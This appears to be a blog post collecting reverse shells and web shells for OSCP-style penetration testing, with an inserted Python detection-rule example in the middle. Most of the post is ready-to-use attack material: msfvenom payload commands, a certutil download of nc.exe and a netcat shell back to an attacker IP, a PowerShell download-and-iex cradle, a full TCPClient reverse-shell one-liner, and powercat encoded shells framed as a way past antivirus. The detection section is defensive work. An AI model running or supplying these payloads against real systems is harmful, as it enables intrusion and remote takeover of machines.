Windows and Linux shells repository
While doing the OSCP I spent a lot of time looking for suitable reverse shells and web shells, so I needed a repository for keeping all the shells I can use in one place.
Before we start, there is an amazing collection at pentestmonkey; make sure to check it out.
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
WEB SHELLS
This GitHub project is an amazing source for web shells, and the good thing about it is that it is continuously updated.
- IIS exploits:
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f asp > shell.asp
- Using certutil.exe (already installed on Windows):
This method is useful when you already have command execution through a web shell and want a full reverse shell on the machine:
cmd=certutil.exe -urlcache -f http://192.168.49.142/nc.exe C:\Users\apache\Documents\nc.exe
cmd=C:\Users\apache\Documents\nc.exe -e cmd.exe 192.168.49.142 443
- PHP web shell
This is an amazing and very stable PHP reverse shell from pentestmonkey.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Windows payloads
- Meterpreter payloads
-- staged[x86] --
windows/exec
windows/meterpreter/reverse_http
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
-- non-staged[x86] --
windows/powershell_reverse_tcp
windows/powershell_bind_tcp
windows/meterpreter_reverse_tcp
windows/meterpreter_reverse_http
windows/meterpreter_bind_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
-- staged[x64] --
windows/x64/exec
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
-- non-staged[x64] --
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_http
windows/x64/meterpreter_reverse_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
- PowerShell payloads
powershell -c iex(new-object net.webclient).downloadstring('http://0.0.0.0/Invoke-PowerShellTcp.ps1')
You can use the above payloads to run anything in the background on the target machine. One example you can run:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('0.0.0.0',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- Encoded shell (helpful for AV)
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe <the content of encodedreverseshell.ps1>
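From the defender's side, the certutil download, the PowerShell download cradle, the TCPClient one-liner and the encoded shell above all leave a recognisable process command line in Sysmon Event ID 1 or Windows Security Event 4688 logs. The following is an added example, not part of this repository, of a small rule set run over constructed command lines; the rule names and sample lines are assumptions made for this illustration, and the encoded-command rule decodes the UTF-16LE base64 so that encoding alone does not hide the pattern.

```python
import base64
import re

# Constructed process-creation command lines (not real log data), modelled on the
# techniques on this page plus two benign look-alikes for the false-positive check.
SAMPLE_COMMAND_LINES = [
    r"certutil.exe -urlcache -f http://192.168.49.142/nc.exe C:\Users\apache\Documents\nc.exe",
    r"C:\Users\apache\Documents\nc.exe -e cmd.exe 192.168.49.142 443",
    "powershell -c iex(new-object net.webclient).downloadstring('http://0.0.0.0/Invoke-PowerShellTcp.ps1')",
    "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('0.0.0.0',443);$sendback = (iex $data 2>&1 | Out-String)\"",
    "powershell.exe -NoP -W Hidden -EncodedCommand " + base64.b64encode("iex $data".encode("utf-16le")).decode(),
    r"certutil.exe -hashfile C:\Windows\System32\notepad.exe SHA256",  # benign certutil use
    "powershell -c Get-Process",                                       # benign PowerShell use
]

# (name, regex) pairs; the names are hypothetical labels chosen for this example.
RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("nc_exec_shell", re.compile(r"\bnc(64)?(\.exe)?\b.*\s-e\s+\S+", re.I)),
    ("ps_download_cradle", re.compile(r"net\.webclient\b.*\.downloadstring\(", re.I)),
    ("ps_iex", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("ps_tcp_client", re.compile(r"net\.sockets\.tcpclient", re.I)),
]
# powershell -e / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_RE = re.compile(
    r"powershell(\.exe)?\b.*?\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """All rule hits; hits inside a decoded -EncodedCommand payload are prefixed 'decoded:'."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("ps_encoded_command")
        hits += ["decoded:" + name for name, rx in RULES if rx.search(decoded)]
    return hits

def scan(cmdlines):
    # Only flagged lines are returned, mapped to the rules they triggered.
    return {line: hits for line in cmdlines if (hits := classify(line))}
```

The two benign lines (certutil -hashfile, Get-Process) produce no hits, which is the check that the rules key on the download and execution switches rather than on the binary name alone.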
- mkpsrevshell
This is a simple but very effective reverse shell; I have used it plenty of times on Windows machines.
To use the script, download it and then set the IP and port number as shown below:
python3 mkpsrevshell.py 10.10.10.10 443
As seen above, the output of the script is an encoded reverse shell ready to be used directly on the target (Windows) machine. Copy the whole output and paste it there as shown below.
Start an nc listener on your Kali machine; running the above output on the target should then give you a reverse shell.
Linux payloads
- Meterpreter payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf
[x86 Payloads]
linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/reverse_http
linux/x86/meterpreter_reverse_http
linux/x86/meterpreter_reverse_tcp
linux/x86/meterpreter_bind_tcp
linux/x86/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell/bind_tcp
[x64 Payloads]
linux/x64/meterpreter/bind_tcp
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_http
linux/x64/meterpreter_reverse_http
linux/x64/meterpreter_reverse_tcp
linux/x64/meterpreter_bind_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell/bind_tcp
Python shells [Linux only]
- On the target (Linux) machine:
Download the tcp_pty_backconnect.py script to the target machine, edit the host/port values in it, then run the script:
python tcp_pty_backconnect.py
- On the attacking machine (Kali):
Download the tcp_pty_shell_handler.py script, then run it using the syntax below:
Note: you need to run tcp_pty_backconnect.py on the target before starting the handler below.
python tcp_pty_shell_handler.py -b 192.168.201.37:80
There are other scripts you can try in the above repository, such as UDP and bind shells.
Finally, this repository is not meant to be complete; feel free to comment with your favorite reverse shell, and keep looking for new and awesome $h333llss!